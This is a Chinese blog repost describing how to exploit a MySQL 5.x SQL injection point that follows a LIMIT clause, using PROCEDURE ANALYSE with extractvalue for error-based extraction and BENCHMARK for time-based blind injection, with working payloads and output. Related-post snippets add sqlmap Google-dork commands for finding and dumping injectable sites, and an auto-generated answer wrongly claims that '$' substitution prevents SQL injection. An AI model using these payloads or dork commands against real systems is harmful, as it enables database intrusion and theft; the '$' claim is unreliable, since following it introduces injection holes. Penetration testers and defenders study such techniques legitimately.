mysql注入的关键字_Mysql注入点在limit关键字后面的利用方法

于 2021-01-19 12:12:12 发布
阅读量244 收藏
点赞数
文章标签: mysql注入的关键字
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35249119/article/details/113238282
版权

Post Views:

5,294

描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。

细节

在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

问题的关键在于,语句中有order by 关键字,我们知道,mysql 中在order by 前面可以使用union 关键字,所以如果注入点前面没有order by 关键字,就可以顺利的使用union 关键字,但是现在的情况是,注入点前面有order by 关键字,这个问题在stackoverflow 上和sla.ckers上都有讨论,但是都没有什么有效的解决办法。

我们先看看 mysql 5.x 的文档中的 select 的语法:

SELECT

[ALL | DISTINCT | DISTINCTROW ]

[HIGH_PRIORITY]

[STRAIGHT_JOIN]

[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]

[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]

select_expr [, select_expr ...]

[FROM table_references

[WHERE where_condition]

[GROUP BY {col_name | expr | position}

[ASC | DESC], ... [WITH ROLLUP]]

[HAVING where_condition]

[ORDER BY {col_name | expr | position}

[ASC | DESC], ...]

[LIMIT {[offset,] row_count | row_count OFFSET offset}]

[PROCEDURE procedure_name(argument_list)]

[INTO OUTFILE 'file_name' export_options

| INTO DUMPFILE 'file_name'

| INTO var_name [, var_name]]

[FOR UPDATE | LOCK IN SHARE MODE]]

limit 关键字后面还有 PROCEDURE 和 INTO 关键字,into 关键字可以用来写文件,但这在本文中不重要,这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)。

尝试用这个存储过程:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE支持两个参数,试试两个参数:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);

ERROR 1386 (HY000): Can't use ORDER clause with this procedure

依然无效,尝试在 ANALYSE 中插入 sql 语句:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);

响应如下:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’

事实证明,sleep 没有被执行,最终,我尝试了如下payload :

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

啊哈,上面的方法就是常见的报错注入,所以,如果注入点支持报错,那所有问题都ok,但是如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

有意思的是,这里不能用sleep而只能用 BENCHMARK。

转自:http://www.freebuf.com/articles/web/57528.html

码代码的六月
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C# 链接mysql数据库 出现 给定关键字不在字典中
11-02
C#在链接mysql数据库的时候 间歇性的会出现 打开链接的时候会报错. 调整mysql.data.dll 链接驱动版本. 将程序引用dll,替换为上传压缩包中的dll
Mysql注入limit关键字后面利用方法
m0_46315342的博客
07-23 745
遇到一个这样贱贱的题目: 小明经过学习,终于对SQL注入有了理解,她知道原来sql注入的发生根本原因还是数据和语句不能正确分离的原因,导致数据作为sql语句执行;但是是不是只要能够控制sql语句的一部分就能够来利用获取数据呢?小明经过思考知道,where条件可控的情况下,实在是太容易了,但是如果是在limit条件呢? 所以就写一篇博客记录一下 先看看 mysql 5.x 的文档中的 select 的语法: SELECT [ALL | DISTINCT | DISTINCTROW ] [HIGH_PRIORI
sql注入攻击中常用的几个关键字
liweibin812的博客
02-27 4723
在sql注入漏洞查询中,当验证有SQL注入存在时,我们需要进一步验证该漏洞的危害性,需要使用到一些高级手段来拿到数据库中的一些关键字段甚至是整个数据库权限。下面是一些常用的sql注入攻击关键字。 union关键字:是将多个select 查询语句的结果组合到一个结果集中,没列的数据类型必须相同。 information_schema.schemata :提供了数据库相关的信息 (1)查询用户数...
MySql关键字
weixin_33940102的博客
02-17 199
MySql关键字 今天写程序的出了问题,怎么弄都不正确,我也无策,调试了好久突然发现在DB表里用了''check"作为表名,"index“作为字段名,马上检查了一下SQL语句中有没有加安全符“··",果然没.问题就出在这里了,因为index和check都是mysql关键字, 查了一下,关键字(有的是保留字 )还真是不少.在MySQL中,下表中的字词显...
SQL注入搜索关键字
weixin_34355881的博客
03-15 1551
注入关键字个人从网上和一些教程钟归纳了一些批量搜索注入关键字,分享给大家使用,有些关键字还可以扩展,寻找注入靠的不是其他,就是自己的想象力!下面的关键字可以随意组合。NewsInfo.asp?id=otherinfo.asp?id=info.asp?id=news_show.asp?id=showhf.asp?id=detailshow.asp?ID...
注入之Google搜索(附关键字)
security.blog.cndn.net
03-11 2599
利用Google Dorks字符串找到可注入的网站 sqlmap.py -g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字) 使用示例: 1. sqlmap.py -g "inurl:php?id=" 2. sqlmap.py -g "inurl:php?id=" --dump-all --batch google搜索注入 自动跑出所有字段 部分...
MySQL单表多关键字模糊查询的实现方法
12-15
在最近的一个项目需要实现在MySQL单表多关键字模糊查询,但这数个关键字并不一定都存在于某个字段。例如现有table表,其中有title,tag,description三个字段,分别记录一条资料的标题,标签和介绍。然后根据用户...
MySQL关键字Distinct的详细介绍
01-19
MySQL关键字Distinct用法介绍 DDL Prepare SQL: create table test(id bigint not null primary key auto_increment, name varchar(10) not null, phone varchar(10) not null, email varchar(30) not null)...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
主要介绍了php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击的相关资料,需要的朋友可以参考下
MySQL 5.7中的关键字与保留字详解
12-15
MySQL和Oracle的关键字还是不尽相同的,在Oracle数据库中,我们的数据表中定义了大量的code字段用来表示主键,但是在MySQL中code是关键字,使用以前的处理方法就有些“水土不服”。 下面我们来了解一下MySQL中的...
整理出来的SQL注入关键字
03-06
整理出来的关于SQL注入时所需要的关键字,很全面,覆盖了很多,包括asp,php等等
啊D注入关键字
03-14
啊D注入关键字,最全关键字
sql注入关键字大全
07-27
sql注入关键字大全,包括sqlserve , odbc,等
mysql中的union和order by、limit
热门推荐
星星的技术专栏
01-23 3万+
我有一个表CREATE TABLE `test1` (  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,  `name` varchar(20) NOT NULL,  `desc` varchar(100) NOT NULL,  PRIMARY KEY (`id`)) ENGINE=InnoDB DEFAULT CHARSET=utf8 (
mysql 关键字引起的语句错误
一只灰机
06-06 746
经常有一些语句报错误,有的是因为字段名与关键字重叠     ADD ALL ALTER ANALYZE AND AS ASC ASENSITIVE BEFORE BETWEEN BIGINT BINARY BLOB BOTH BY CALL CASCADE CASE CHANGE CHAR CHARACTER CHEC...
idea 检查XML文件报错问题解决(expected, got order , expected, got desc,expected, All,)
AirOrange_qi的博客
05-20 6239
idea 检查XML文件报错问题解决(expected, got ‘order’ ,’;’ expected, got ‘desc’,expected, All,) 在使用MybatisCodeHelperPro插件后 expected, got ‘order’ 报错 expected, All,········· 报错 ‘;’ expected, got ‘desc’ 报错 解决方法 1.使用choose when 分支报错 例: <choose> <wh
SQL运行内幕:从执行原理看调优的本质
peng_zhanxuan的技术博客
06-28 1078
相信大家看过无数的MySQL调优经验贴了,会告诉你各种调优手段,如: 避免 select *; join字段走索引; 慎用in和not in,用exists取代in; 避免在where子句中对字段进行函数操作; 尽量避免更新聚集索引; group by如果不需要排序,手动加上 order by null; join选择小表作为驱动表; order by字段尽量走索引… 其中有些手段也许跟随者MySQL版本的升级过时了。我们真的需要背这些调优手段吗?我觉得是没有必要的,在掌握MySQL存储架构和SQL执行
Mybatis Plus——以XML方式使用 Wrapper 自定义SQL时IDEA错误[**expected, got ‘${‘]解决方案
无限迭代中......
08-03 5437
问题描述 '(', ',', CROSS, FOR, GROUP, HAVING, INNER, INTO, JOIN, LEFT, LIMIT, LOCK, NATURAL, ORDER, PROCEDURE, RIGHT, STRAIGHT_JOIN, UNION, WHERE, WINDOW or '[' expected, got '${' 官方文档 https://mp.baomidou.com/guide/wrapper.html#使用-wrapper-自定义sql 问题分
mysql 第04章 SQL语句
10-24 152
2015-10-24 目录 一、 DDL 1.CREATE CREATE DATABASE CREATE EVENT CREATE FUNCTION CREATE FUNCTION UDF CREATE INDEX CREATE PROCEDURE CREATE SERVER CREATE TABLE ...
mysqllimit动态传参数
最新发布
08-15
回答: 在MySQL中,使用LIMIT关键字可以限制查询结果的返回数量。它可以用于返回前几条或者中间某几行数据。在查询语句中,可以使用LIMIT [offset,其中offset指定了从结果集中的第几行开始返回数据。比如,SELECT * FROM table LIMIT 10,表示返回table表中的前10条数据。在使用LIMIT时,可以使用变量来动态传递参数。在SQL语句中,可以使用$符号来表示变量。例如,limit ${pageNo},${pageSize},其中pageNo和pageSize是传递进来的参数。需要注意的是,在使用LIMIT时,不应该使用#符号,而是应该使用$符号。#符号将传递进来的参数视为字符串,而$符号会将参数直接生成在SQL语句中。使用#符号可能会导致错误,而使用$符号可以防止SQL注入。如果需要在MySQL中动态传递参数给LIMIT,可以使用类似的方式,即将参数用$包裹起来。例如,limit ${paramName},其中paramName是传递进来的参数名。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [MySQLlimit使用动态参数的解决方法(拼接SQL字符串语句来执行SQL)](https://blog.csdn.net/weixin_35993148/article/details/113273530)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [mysql中ibatis的limit动态传参数](https://blog.csdn.net/YangJuanCMXC/article/details/83976141)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值